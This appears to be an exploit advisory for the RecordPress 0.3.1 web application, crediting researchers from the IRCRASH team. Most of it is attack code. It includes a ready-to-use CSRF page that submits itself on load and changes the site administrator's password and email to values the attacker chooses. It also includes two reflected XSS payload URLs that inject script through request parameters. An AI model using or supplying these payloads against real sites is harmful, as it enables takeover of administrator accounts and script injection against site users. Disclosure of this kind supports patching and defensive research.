WebApplication: RecordPress 0.3.1
Type of vunlnerability: CSRF (Change Admin Password) And XSS
Risk of use: Medium
----------------------------------------------------------------
Producer Website: http://www.recordpress.org/
----------------------------------------------------------------
Discovered by: Khashayar Fereidani
Team Website: http://IRCRASH.COM
Team Members: Khashayar Fereidani-Sina YazdanMehr-Arash Allebrahim
English Forums: Http: // IRCRASH. COM/forums/
Email: irancrash [a t] gmail [d o t] com
Facebook: http://facebook.com/fereidani
----------------------------------------------------------------
CSRF For Change Admin Password:
<Html>
<Head> <Body onLoad = javascript: document. form. submit ()>
<Form action = "http: // examplesite/admin/rp-settings-users-edit-db.php? Id = 1 ";
Method = "POST" name = "form">
<Input type = "hidden" name = "formusername" value = "admin">
<Input type = "hidden" name = "formname" value = "admin">
<Input type = "hidden" name = "formemail" value = "email@pwnedpwnedpwned.sss">
<Input type = "hidden" name = "formpass" value = "password">
<Input type = "hidden" name = "formpass2" value = "password">
<Input type = "hidden" name = "formadminstatus" value = "2">
<Input type = "hidden" name = "rp-settings-users-edit-db" value = "Confirm + % BB">
</Form>
</Body>
</Html>
------------------------------------------------
Cross Site Scripting Vulnerabilities:
Alert (123)Http: // examplesite/header. php? Row [titledesc] = <script> alert (123) </script>
Alert (123)Http: /examplesite/admin/rp-menu.php? _ SESSION [sess_user] = <script> alert (123) </script>